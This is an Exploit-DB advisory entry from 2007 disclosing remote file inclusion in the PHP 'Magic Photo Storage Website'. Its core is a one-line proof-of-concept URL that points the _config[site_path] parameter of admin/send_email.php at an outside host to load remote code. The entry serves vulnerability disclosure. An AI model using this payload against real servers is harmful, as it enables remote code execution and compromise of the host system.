Magic Photo Storage Website - '/admin/send_email.php?_config[site_path]' Remote File Inclusion

EDB-ID:

29417


Author:

IbnuSina

Type:

webapps


Platform:

PHP

Date:

2007-01-09


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/21965/info
          
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
          
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/path/admin/send_email.php?_config[site_path]=http://www.example2.com